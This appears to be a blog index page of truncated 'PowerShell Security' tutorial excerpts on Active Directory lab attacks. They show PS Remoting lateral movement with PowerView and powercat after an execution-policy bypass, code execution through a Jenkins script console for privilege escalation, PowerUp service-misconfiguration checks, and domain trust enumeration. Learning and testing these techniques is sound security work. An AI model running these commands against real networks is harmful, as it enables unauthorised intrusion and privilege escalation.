Powershell * POWERSHELL SECURITY

Lateral Movement PS Remoting

One to one We required admin rights PS shell to perform all this task . PS C:\WINDOWS\system32> Enable-PSRemoting –Force PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -nop -exec bypass PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powercat.ps1 PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1 PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Id 1 [WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami…

Powershell * POWERSHELL SECURITY

Local Privilege Escalation Part 2

As i consider the Jenkin is already present on server and we have the credential with us After login go to : http://192.168.65.195:8080/scirpts/ type this below mention command and click on run Code : def sout = new StringBuffer(), serr = new StringBuffer() def proc = ‘whoami’.execute() proc.consumeProcessOutput(sout,serr) proc.waitForOrKill(1000) println “out>$sout err> $serr” Now try…

Powershell * POWERSHELL SECURITY

Local Privilege Escalation Part 1

Services issues using powerup: PS C:\Users\victim.SECURITY\Downloads\ > Get-ServiceUnquoted –verbose Get services where the current user can write to its binary path or change arguments to the binary: Get services where the current user can write to its binary path or change arguments to the binary: PS C:\Users\victim.SECURITY\Downloads\ > Get-ModifiableServiceFile -Verbose Get the services whose configuration…

Powershell * POWERSHELL SECURITY

Domain Enumeration Part 4

Domain Trust Mapping : Get a list of all domain trusts for the current domain : PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetDomainTrust PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetDomainTrust -domain ujjtest.security.local PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADTrust PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADTrust -Identity setest.local PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> (Get-ADForest).domains Forest Mapping : Get all global catalogs for the current forest : Map trusts of a forest : PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView>…